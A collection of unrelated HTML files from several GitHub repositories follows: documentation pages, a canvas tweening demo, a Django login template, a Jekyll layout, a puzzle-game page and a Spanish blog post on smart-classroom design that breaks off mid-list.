<p>Definition at line <a class="el" href="notify__on__write_8hpp_source.html#l00058">58</a> of file <a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>.</p>
</div>
</div>
<a class="anchor" id="a6b253c5e14b4a4a80abde7530463a59e"></a><!-- doxytag: member="adobe::notify_on_write::operator=" ref="a6b253c5e14b4a4a80abde7530463a59e" args="(const value_type &x)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a>& operator= </td>
<td>(</td>
<td class="paramtype">const <a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a> & </td>
<td class="paramname"> <em>x</em> )</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Definition at line <a class="el" href="notify__on__write_8hpp_source.html#l00046">46</a> of file <a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>.</p>
</div>
</div>
<a class="anchor" id="a3595c509dd4b3cad658dd7a1745a5880"></a><!-- doxytag: member="adobe::notify_on_write::write" ref="a3595c509dd4b3cad658dd7a1745a5880" args="(UnaryFunction proc)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void write </td>
<td>(</td>
<td class="paramtype">UnaryFunction </td>
<td class="paramname"> <em>proc</em> )</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Definition at line <a class="el" href="notify__on__write_8hpp_source.html#l00062">62</a> of file <a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>.</p>
</div>
</div>
</div>
<!-- Begin Footer -->
</td></tr>
</table>
</div> <!-- content -->
<div class='footerdiv'>
<div id='footersub'>
<ul>
<li><a href="http://www.adobe.com/go/gftray_foot_aboutadobe">Company</a> | </li>
<li><a href="http://www.adobe.com/go/gftray_foot_privacy_security">Online Privacy Policy</a> | </li>
<li><a href="http://www.adobe.com/go/gftray_foot_terms">Terms of Use</a> | </li>
<li><a href="http://www.adobe.com/go/gftray_foot_contact_adobe">Contact Us</a> | </li>
<li><a href="http://www.adobe.com/go/gftray_foot_accessibility">Accessibility</a> | </li>
<li><a href="http://www.adobe.com/go/gftray_foot_report_piracy">Report Piracy</a> | </li>
<li><a href="http://www.adobe.com/go/gftray_foot_permissions_trademarks">Permissions & Trademarks</a> | </li>
<li><a href="http://www.adobe.com/go/gftray_foot_product_license_agreements">Product License Agreements</a> | </li>
<li><a href="http://www.adobe.com/go/gftray_foot_feedback">Send Feedback</a></li>
</ul>
<div>
<p>Copyright © 2006-2007 Adobe Systems Incorporated.</p>
<p>Use of this website signifies your agreement to the <a href="http://www.adobe.com/go/gftray_foot_terms">Terms of Use</a> and <a href="http://www.adobe.com/go/gftray_foot_privacy_security">Online Privacy Policy</a>.</p>
<p>Search powered by <a href="http://www.google.com/" target="new">Google</a></p>
</div>
</div>
</div>
<script type="text/javascript">
_uacct = "UA-396569-1";
urchinTracker();
</script>
</body>
</html>
|
examples/circularNetwork.html
|
ekeneijeoma/ijeoma.js
|
<head>
<style>
body {
padding: 0;
margin: 0;
}
div {
position: absolute;
z-index: 100;
padding: 10px 0 0 10px;
}
</style>
</head>
<body>
<div>
<button id="nodes">Hide/Show Nodes</button>
<button id="links">Hide/Show Links</button>
<button id="colors">Color/Black&White</button>
<button id="reset">Reset</button>
<button>Click and drag around to scrub</button>
</div>
<script src="js/RequestAnimationFrame.js"></script>
<script src="js/utils.js"></script>
<script language="javascript" src="../build/ijeoma.js"></script>
<script language="javascript">
var width = window.innerWidth;
var height = window.innerHeight;
var nodes = [];
var nodeSize = 5;
var nodeCount = 300;
var circleCount = 15;
var circleOffset = 50;
var backgroundColor, linkColor, textColor;
var nodesVisible = true;
var linksVisible = true;
var usingColor = true;
var TWO_PI = Math.PI * 2;
var CircularNode = function(s, r, color) {
this.x = 0;
this.y = 0;
this.size = s;
this.radius = r;
this.angle = random(TWO_PI);
this.color = color;
this.angleTween = null;
this.radiusTween = null;
this.update = function() {
this.x = Math.cos(this.angle) * this.radius;
this.y = Math.sin(this.angle) * this.radius;
}
this.draw = function() {
context.beginPath();
context.arc(this.x, this.y, this.size, 0, TWO_PI);
context.fillStyle = this.color;
context.fill();
}
return this;
};
setup();
draw();
function setup() {
var canvas = document.createElement('canvas');
canvas.width = width;
canvas.height = height;
document.body.appendChild(canvas)
context = canvas.getContext('2d');
context.lineWidth = .5;
backgroundColor = 'white';
textColor = 'black';
linkColor = 'black';
setupNodes();
document.getElementById('nodes').onclick = function() {
nodesVisible = !nodesVisible;
};
document.getElementById('links').onclick = function() {
linksVisible = !linksVisible;
};
document.getElementById('colors').onclick = function() {
usingColor = !usingColor;
for (var i = 0; i < nodes.length; i++)
nodes[i].color = (usingColor) ? randomColor() : randomBW();
};
document.getElementById('reset').onclick = setupNodes;
flag = false;
document.onmousedown = function(e) {
flag = true;
MOTION.pauseAll();
}
document.onmousemove = function(e) {
if (flag) {
for (var i = 0; i < nodes.length; i++) {
nodes[i].angleTween.seek(e.clientX / width);
nodes[i].radiusTween.seek(e.clientY / height);
}
}
}
document.onmouseup = function(e) {
flag = false;
MOTION.resumeAll();
}
}
function setupNodes() {
nodes = [];
for (var i = 0; i < nodeCount; i++) {
var n = new CircularNode(nodeSize, roundRandom(2, circleCount) * circleOffset, (usingColor) ? randomColor() : randomBW());
var duration1 = roundRandom(15000, 30000);
var endAngle = n.angle + (roundRandom(100) % 2 == 0 ? -TWO_PI : TWO_PI);
n.angleTween = new MOTION.Tween(n, 'angle', endAngle, duration1).repeat().play();
var duration2 = roundRandom(5000, 7500);
var endRadius = roundRandom(1, circleCount) * circleOffset
n.radiusTween = new MOTION.Tween(n, 'radius', endRadius, duration2, 0, MOTION.Quad.InOut).repeat().reverse().play()
nodes.push(n)
}
}
function draw(time) {
requestAnimationFrame(draw);
MOTION.update(time);
context.fillStyle = backgroundColor;
context.fillRect(0, 0, width, height);
context.save();
context.translate(width / 2, height / 2);
for (var i = 0; i < nodes.length; i++) {
nodes[i].update()
if (nodesVisible) nodes[i].draw();
}
if (linksVisible)
for (var i = 0; i < nodes.length; i++)
for (var j = 0; j < nodes.length; j++) {
var dx = nodes[j].x - nodes[i].x
var dy = nodes[j].y - nodes[i].y
if (dx * dx + dy * dy < circleOffset * circleOffset * 2) {
context.beginPath();
context.moveTo(nodes[i].x, nodes[i].y);
context.lineTo(nodes[j].x, nodes[j].y);
var linkColor = context.createLinearGradient(nodes[i].x, nodes[i].y, nodes[j].x, nodes[j].y);
linkColor.addColorStop(0, nodes[i].color);
linkColor.addColorStop(1, nodes[j].color);
context.strokeStyle = linkColor;
context.stroke();
}
}
context.restore();
}
</script>
</body>
|
src/templates/public/login.html
|
micfan/dinner
|
{% extends "base/base.html" %}
{% load static from staticfiles %}
{% block title %}登录{% endblock %}
{% block css %}
<link href="{% static 'css/login.css' %}" rel="stylesheet">
{% endblock%}
{% block body %}
{% if messages %}
<ul class="messages">
{% for message in messages %}
<li{% if message.tags %} class="{{ message.tags }}"{% endif %}>{{ message }}</li>
{% endfor %}
</ul>
{% endif %}
<div class="login-container">
<form class="form-signin" role="form" action="/login/" method="post">
{% csrf_token %}
<h2 class="form-signin-heading">Please sign in</h2>
<input type="text" class="form-control" placeholder="Username or E-mail" required="" autofocus=""
name="email" value="{{ email }}">
<input type="password" class="form-control" placeholder="Password" required="" name="password">
<input type="hidden" name="next" value="{{ next }}{{ request.GET.next }}">
<a class="forgot-password" href="{% url 'password_reset' %}">忘记密码?</a>
<button class="btn btn-lg btn-primary btn-block" type="submit">Sign in</button>
</form>
{# <div class="form-signin">#}
{# <a href="{% url 'public:github' %}" style="display: inline-block;">#}
{# <img src="{% static 'img/logo/GitHub-Mark/PNG/GitHub-Mark-32px.png' %}" style="height: 18px;position: relative; top: -2px;">#}
{# </a>#}
{# </div>#}
</div>
{% endblock %}
|
doc/compose/class-use/MessageSenderPair.html
|
tokahuke/java-for-playwrights
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="pt">
<head>
<!-- Generated by javadoc (1.8.0_60) on Wed Mar 02 17:26:14 BRT 2016 -->
<title>Uses of Class compose.MessageSenderPair</title>
<meta name="date" content="2016-03-02">
<link rel="stylesheet" type="text/css" href="../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class compose.MessageSenderPair";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../compose/MessageSenderPair.html" title="class in compose">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../index.html?compose/class-use/MessageSenderPair.html" target="_top">Frames</a></li>
<li><a href="MessageSenderPair.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class compose.MessageSenderPair" class="title">Uses of Class<br>compose.MessageSenderPair</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation">
<caption><span>Packages that use <a href="../../compose/MessageSenderPair.html" title="class in compose">MessageSenderPair</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Package</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="#compose">compose</a></td>
<td class="colLast"> </td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="compose">
<!-- -->
</a>
<h3>Uses of <a href="../../compose/MessageSenderPair.html" title="class in compose">MessageSenderPair</a> in <a href="../../compose/package-summary.html">compose</a></h3>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing fields, and an explanation">
<caption><span>Fields in <a href="../../compose/package-summary.html">compose</a> with type parameters of type <a href="../../compose/MessageSenderPair.html" title="class in compose">MessageSenderPair</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Field and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>private java.util.concurrent.BlockingQueue<<a href="../../compose/MessageSenderPair.html" title="class in compose">MessageSenderPair</a><<a href="../../compose/ReceivingActor.html" title="type parameter in ReceivingActor">M</a>>></code></td>
<td class="colLast"><span class="typeNameLabel">ReceivingActor.</span><code><span class="memberNameLink"><a href="../../compose/ReceivingActor.html#returnQueue">returnQueue</a></span></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>private java.util.concurrent.BlockingQueue<<a href="../../compose/MessageSenderPair.html" title="class in compose">MessageSenderPair</a><<a href="../../compose/Connection.html" title="type parameter in Connection">M</a>>></code></td>
<td class="colLast"><span class="typeNameLabel">Connection.</span><code><span class="memberNameLink"><a href="../../compose/Connection.html#returnQueue">returnQueue</a></span></code> </td>
</tr>
</tbody>
</table>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../compose/package-summary.html">compose</a> that return <a href="../../compose/MessageSenderPair.html" title="class in compose">MessageSenderPair</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>(package private) <a href="../../compose/MessageSenderPair.html" title="class in compose">MessageSenderPair</a><<a href="../../compose/ReceivingActor.html" title="type parameter in ReceivingActor">M</a>></code></td>
<td class="colLast"><span class="typeNameLabel">ReceivingActor.</span><code><span class="memberNameLink"><a href="../../compose/ReceivingActor.html#take--">take</a></span>()</code> </td>
</tr>
</tbody>
</table>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Method parameters in <a href="../../compose/package-summary.html">compose</a> with type arguments of type <a href="../../compose/MessageSenderPair.html" title="class in compose">MessageSenderPair</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>(package private) void</code></td>
<td class="colLast"><span class="typeNameLabel">ReceivingActor.</span><code><span class="memberNameLink"><a href="../../compose/ReceivingActor.html#setQueueAndSenderName-java.util.concurrent.BlockingQueue-java.lang.String-">setQueueAndSenderName</a></span>(java.util.concurrent.BlockingQueue<<a href="../../compose/MessageSenderPair.html" title="class in compose">MessageSenderPair</a><<a href="../../compose/ReceivingActor.html" title="type parameter in ReceivingActor">M</a>>> queue,
java.lang.String senderName)</code> </td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../compose/MessageSenderPair.html" title="class in compose">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../index.html?compose/class-use/MessageSenderPair.html" target="_top">Frames</a></li>
<li><a href="MessageSenderPair.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
_layouts/default.html
|
abcamus/abcamus.github.io
|
<!DOCTYPE html>
<html>
{% include head.html %}
<!--
<script type="text/javascript"
src="/js/MathJax.js?config=TeX-AMS-MML_HTMLorMML,/js/config/TeX-AMS-MML_HTMLorMML.js">
</script>
<script type="text/javascript"
src="http://cdn.mathjax.org/mathjax/latest/MathJax.js">
</script>
-->
<script type="text/x-mathjax-config">
MathJax.Hub.Config({
extensions: ["tex2jax.js"],
jax: ["input/TeX", "output/HTML-CSS"],
tex2jax: {
inlineMath: [ ['$','$'], ["\\(","\\)"] ], displayMath: [ ['$$','$$'], ["\\[","\\]"] ], processEscapes: true },
"HTML-CSS": { availableFonts: ["TeX"] }
});
</script>
<script type="text/javascript"
src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<body>
{% include header.html %}
{{ content }}
{% include footer.html %}
{% include backToTop.html %}
<script src="{{ " /js/main.js " | prepend: site.baseurl }}" charset="utf-8"></script>
<script src="{{ " /js/scroll.min.js " | prepend: site.baseurl }}" charset="utf-8"></script>
</body>
</html>
|
TAIHAO2019/pub/SmallGame/AsFastAsYouCan2/5c7e6aee60c38f684cb035a00fa109ccc1ca021d9201745b8b28bb9477bc5fb9.html
|
simonmysun/praxis
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>18 --> 19</title>
<link href="./../../assets/style.css" rel="stylesheet">
</head>
<body>
<h2>You have to be fast</h2>
<a href="./482cda37e31225266f2a07bef962f45c587559da3d38345d7beb23550c0eae54.html">Teleport</a>
<hr>
<a href="./../../about.md">About</a> (Spoilers! )
<script src="./../../assets/md5.js"></script>
<script>
window.currentLevel = 7;
</script>
<script src="./../../assets/script.js"></script>
</body>
</html>
|
2016/01/15/Smart-classroom-innovando-el-espacio-de-aprendizaje-con-TIC.html
|
marchelo2212/marchelo2212.github.io
|
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<title>Smart classroom: innovando el espacio de aprendizaje con TIC - Tecnología, Innovación y más..</title>
<meta name="HandheldFriendly" content="True">
<meta name="MobileOptimized" content="320">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Smart classroom: innovando el espacio de aprendizaje con TIC">
<meta name="twitter:description" content="">
<meta property="og:type" content="article">
<meta property="og:title" content="Smart classroom: innovando el espacio de aprendizaje con TIC">
<meta property="og:description" content="">
<link href="/favicon.ico" rel="shortcut icon" type="image/x-icon">
<link href="/apple-touch-icon-precomposed.png" rel="apple-touch-icon">
<link rel="stylesheet" type="text/css" href="//marchelo2212.github.io/themes/uno/assets/css/uno.css?v=1.0.0" />
<link rel="canonical" href="https://marchelo2212.github.io/2016/01/15/Smart-classroom-innovando-el-espacio-de-aprendizaje-con-TIC.html" />
<meta property="og:site_name" content="Tecnología, Innovación y más.." />
<meta property="og:type" content="article" />
<meta property="og:title" content="Smart classroom: innovando el espacio de aprendizaje con TIC" />
<meta property="og:description" content="Comparto con ustedes, el caso de estudio creado por el profesor Guillermo Bautista. Analizado y desarrollado en la Universitat Oberta de Catalunya (UOC). 1.[fase1] &lt;&lt;#presupuesto,Presupuesto&gt;&gt; [Presupuesto] Learn how to use attributes within the link..." />
<meta property="og:url" content="https://marchelo2212.github.io/2016/01/15/Smart-classroom-innovando-el-espacio-de-aprendizaje-con-TIC.html" />
<meta property="og:image" content="http://www.teslainnovacion.es/wp-content/uploads/2012/03/decalogo.jpg[]" />
<meta property="article:published_time" content="2016-01-15T05:00:00.000Z" />
<meta property="article:modified_time" content="2016-07-30T18:44:15.159Z" />
<meta property="article:tag" content="e-learning" />
<meta property="article:tag" content="innovación" />
<meta property="article:tag" content="smarthclasroom" />
<meta property="article:tag" content="TIC" />
<meta property="article:tag" content="educación" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:title" content="Smart classroom: innovando el espacio de aprendizaje con TIC" />
<meta name="twitter:description" content="Comparto con ustedes, el caso de estudio creado por el profesor Guillermo Bautista. Analizado y desarrollado en la Universitat Oberta de Catalunya (UOC). 1.[fase1] &lt;&lt;#presupuesto,Presupuesto&gt;&gt; [Presupuesto] Learn how to use attributes within the link..." />
<meta name="twitter:url" content="https://marchelo2212.github.io/2016/01/15/Smart-classroom-innovando-el-espacio-de-aprendizaje-con-TIC.html" />
<meta name="twitter:image:src" content="http://www.teslainnovacion.es/wp-content/uploads/2012/03/decalogo.jpg[]" />
<script type="application/ld+json">
{
"@context": "http://schema.org",
"@type": "Article",
"publisher": "Tecnología, Innovación y más..",
"author": {
"@type": "Person",
"name": "Marcelo Sotaminga",
"image": "https://avatars.githubusercontent.com/u/9286299?v=3",
"url": "undefined/author/undefined",
"sameAs": null
},
"headline": "Smart classroom: innovando el espacio de aprendizaje con TIC",
"url": "https://marchelo2212.github.io/2016/01/15/Smart-classroom-innovando-el-espacio-de-aprendizaje-con-TIC.html",
"datePublished": "2016-01-15T05:00:00.000Z",
"dateModified": "2016-07-30T18:44:15.159Z",
"image": "http://www.teslainnovacion.es/wp-content/uploads/2012/03/decalogo.jpg[]",
"keywords": "e-learning, innovación, smarthclasroom, TIC, educación",
"description": "Comparto con ustedes, el caso de estudio creado por el profesor Guillermo Bautista. Analizado y desarrollado en la Universitat Oberta de Catalunya (UOC). 1.[fase1] &lt;&lt;#presupuesto,Presupuesto&gt;&gt; [Presupuesto] Learn how to use attributes within the link..."
}
</script>
<meta name="generator" content="Ghost ?" />
<link rel="alternate" type="application/rss+xml" title="Tecnología, Innovación y más.." href="https://marchelo2212.github.io/rss" />
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/8.4/styles/default.min.css">
</head>
<body class="post-template tag-e-learning tag-innovacion tag-smarthclasroom tag-TIC tag-educacion no-js">
<span class="mobile btn-mobile-menu">
<i class="icon icon-list btn-mobile-menu__icon"></i>
<i class="icon icon-x-circle btn-mobile-close__icon hidden"></i>
</span>
<header class="panel-cover panel-cover--collapsed " >
<div class="panel-main">
<div class="panel-main__inner panel-inverted">
<div class="panel-main__content">
<h1 class="panel-cover__title panel-title"><a href="https://marchelo2212.github.io" title="link to homepage for Tecnología, Innovación y más..">Tecnología, Innovación y más..</a></h1>
<hr class="panel-cover__divider" />
<p class="panel-cover__description">Sitio dedicado a recopilar las cosas que he realizado en algunos lados, para poder tenerlas todas un poco ordenadas, aquí encontrarás cosas referente a:
Software Libre - GNU / Linux
Innovación Educativa
Ciencia y Tecnología
Entre otras....
</p>
<hr class="panel-cover__divider panel-cover__divider--secondary" />
<div class="navigation-wrapper">
<nav class="cover-navigation cover-navigation--primary">
<ul class="navigation">
<li class="navigation__item"><a href="https://marchelo2212.github.io/#blog" title="link to Tecnología, Innovación y más.. blog" class="blog-button">Blog</a></li>
</ul>
</nav>
<nav class="cover-navigation navigation--social">
<ul class="navigation">
<!-- Twitter -->
<li class="navigation__item">
<a href="https://www.facebook.com/marchelo2212" title="Facebook account">
<i class='icon icon-social-facebook'></i>
<span class="label">Facebook</span>
</a>
</li>
<!-- Twitter -->
<li class="navigation__item">
<a href="https://twitter.com/Marchelo2212" title="Twitter account">
<i class='icon icon-social-twitter'></i>
<span class="label">Twitter</span>
</a>
</li>
<!-- Google Plus -->
<li class="navigation__item">
<a href="https://plus.google.com/u/0/+MarceloSotaminga" title="Google+ account">
<i class='icon icon-social-google-plus'></i>
<span class="label">Google-plus</span>
</a>
</li>
<!-- LinkedIn -->
<li class="navigation__item">
<a href="https://ec.linkedin.com/in/marcelo-sotaminga-9ab64562" title="LinkedIn account">
<i class='icon icon-social-linkedin'></i>
<span class="label">LinkedIn</span>
</a>
</li>
<!-- Email -->
<li class="navigation__item">
<a href="mailto:marcelo@openmailbox.org" title="Email marcelo@openmailbox.org">
<i class='icon icon-mail'></i>
<span class="label">Email</span>
</a>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="panel-cover--overlay"></div>
</div>
</header>
<div class="content-wrapper">
<div class="content-wrapper__inner">
<article class="post-container post-container--single">
<header class="post-header">
<div class="post-meta">
<time datetime="15 Jan 2016" class="post-meta__date date">15 Jan 2016</time> • <span class="post-meta__tags tags">on <a href="https://marchelo2212.github.io/tag/e-learning">e-learning</a>, <a href="https://marchelo2212.github.io/tag/innovacion"> innovación</a>, <a href="https://marchelo2212.github.io/tag/smarthclasroom"> smarthclasroom</a>, <a href="https://marchelo2212.github.io/tag/TIC">TIC</a>, <a href="https://marchelo2212.github.io/tag/educacion"> educación</a></span>
<span class="post-meta__author author"><img src="https://avatars.githubusercontent.com/u/9286299?v=3" alt="profile image for Marcelo Sotaminga" class="avatar post-meta__avatar" /> by Marcelo Sotaminga</span>
</div>
<h1 class="post-title">Smart classroom: innovando el espacio de aprendizaje con TIC</h1>
</header>
<section class="post tag-e-learning tag-innovacion tag-smarthclasroom tag-TIC tag-educacion">
<div id="preamble">
<div class="sectionbody">
<div class="paragraph">
<p>Comparto con ustedes, el caso de estudio creado por el profesor Guillermo Bautista. Analizado y desarrollado en la Universitat Oberta de Catalunya (UOC).</p>
</div>
<div class="paragraph">
<p>1.<a href="#fase1">[fase1]</a><br>
<<#presupuesto,Presupuesto>><br>
<a href="#Presupuesto">[Presupuesto]</a></p>
</div>
<div class="paragraph">
<p>Learn how to <a href="#link-macro-attributes">use attributes within the link macro</a>.</p>
</div>
<div class="paragraph">
<p>efer to <a href="document-b.html#section-b">Section B</a> for more information.</p>
</div>
</div>
</div>
<div class="sect1">
<h2 id="__a_href_fase_1_fase_1_a_dise_o_de_una_aula_smart_classroom"><a href="#Fase 1">[Fase 1]</a>: Diseño de una aula smart classroom</h2>
<div class="sectionbody">
<div class="paragraph">
<p>La educación del siglo XXI se ha visto inmersa por los grandes cambios sociales que se han suscitado por la implementación de las TICs en las diversas actividades del ser humano, esto ha obligado al surgimiento de cambios en el cómo, donde, con quién, y con qué se hacen diversas
cosas u actividades.</p>
</div>
<div class="paragraph">
<p>En el sector de la educación se ha dado la apertura para de creación de nuevos recursos didácticos, en los que un factor común es el uso de la tecnología, por ende han surgido nuevos teorías, modelos o visiones del aprendizaje como son el conectivismo, flipped classroom, gamificación,mlearning, learning analytics entre otras, todas buscando lograr un mejor aprendizaje en el estudiante donde la tecnología, la pedagogía y el conocimiento se mezclen de tal manera que generen aprendizajes significativos y colaborativos para todos los participantes.</p>
</div>
<div class="paragraph">
<p>Así mismo debido al uso masivo de las TICs han aparecido nuevas competencias digitales, tipos de aprendizaje, formas de aprendizaje, etc, es así que el docente ha necesitado responderdiversas exigencias como el manejo de la tecnología, la pedagogía y el conocimiento del contenido (Modelo TPACK) y con ello han surgido nuevas necesidades dentro de los espacios donde se genera el proceso de enseñanza – aprendizaje.</p>
</div>
<div class="paragraph">
<p>El presente proyecto de aula promverá un trabajo colaborativo dentro de todos los integrantes un aula de clases, desarrollará la creatividad de los estudiantes y promoverá el liderazgo de cada uno de ellos, se lo ha diseñado de tal manera que se logren emplear metodologías educativas innovadoras y distruptivas en las que se pueda sacar el mayor provecho de las capacidades de los estudiantes, la metodología y el ambiente físico.</p>
</div>
<div class="paragraph">
<p>En vista que dentro del aula de clases se desarrolarán la mayoría de actividades académicas se ha buscado el lograr un espacio físico que facilite la interacción con las personas de una forma acogedora, pero a la vez, también nos permita generar conocimiento de una forma democrática y asimilar el mismo de igual manera.</p>
</div>
<div class="sect2">
<h3 id="_contextualizaci_n">Contextualización</h3>
<div class="paragraph">
<p>La Unidad Educativa "Milenio", esta ubicada al norte de la ciudad Quito, capital de Ecuador, cuenta con un cuerpo docente de 38 docentes para las diferentes áreas del conocimiento, oferta un bachillerato unificado en ciencias y también se encuetra entre las unidades educativas con capacidad de ofertar un Bachillerato Internacional.</p>
</div>
<div class="paragraph">
<p>Esta propuesta de proyecto esta dirigida a estudiantes de nivel secundario del primer años de bachillerato, entre los 15 y 16 años de edad, para trabajar la asignatura de emprendimiento y gestión; el espacio físico tiene las dimensiones 16m de largo por 8 de ancho, cuenta con energía eléctrica, red inalámbrica interna y conexión a internet con uan velocidad de 10mbps.</p>
</div>
<div class="paragraph">
<p>Este espacio físico se lo contruyó con las siguientes características:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Puerta estilo francesa.</p>
</li>
<li>
<p>Ventanales de 3m en cada pared</p>
</li>
<li>
<p>Vídrios templado transparentes</p>
</li>
<li>
<p>Multiples tomas correinte tanto en paredes como techo.</p>
</li>
<li>
<p>Pizarra para marcador líquido</p>
</li>
<li>
<p>Mueblés stándar de clase (sella y mesas individual) estudiante.</p>
</li>
<li>
<p>Escritio y silla para el docente.</p>
</li>
<li>
<p>Libreros, casilleros para los estudiantes</p>
</li>
<li>
<p>Proyector</p>
</li>
<li>
<p>Sistema de audio (parlantes)</p>
</li>
<li>
<p>Un computador para el docente con sistema windows 8.1</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>De esta manera este espacio posee las carácterísitcas comunes al compararla con otras aulas de clase de la institución; sin embargo gracias a la gestión realizada por parte de las autoridades se ha logrado un fondo de 3200 usd, para la aducación de este espacio y tranformarlo en una smarth class acorde las necesidades de la misma y posibilidades ya existentes.</p>
</div>
<div class="paragraph">
<p>De esta manera el actual proyecto propone un rediseño interno del aula de clase y una optimización del espacio, buscando el mejorar el desempeño de cada participate del proceso</p>
</div>
<div class="sect3">
<h4 id="_transformando_el_aula_de_clase_a_una_smarth_classroom">Transformando el aula de clase a una Smarth ClassRoom</h4>
<div class="paragraph">
<p>Al querer tranformar este espacio es necesario buscar una integracion del espacio con la tecnología, acorde lo mencionado por Gros, 2000 y 2004;
Hutchings y Standley, (2000) donde defienden, a partir de sus ideas y reflexiones, que en una smart classroom debería asociarse</p>
</div>
<div class="paragraph">
<p><em>“…​ una integración invisible de la tecnología en el espacio de aprendizaje.”</em></p>
</div>
<div class="paragraph">
<p>Debtro de una smarth Classroom se busca la intersección de tres elementos que interactúan en el diseño del espacio de aprendizaje:</p>
</div>
<div class="olist arabic">
<ol class="arabic">
<li>
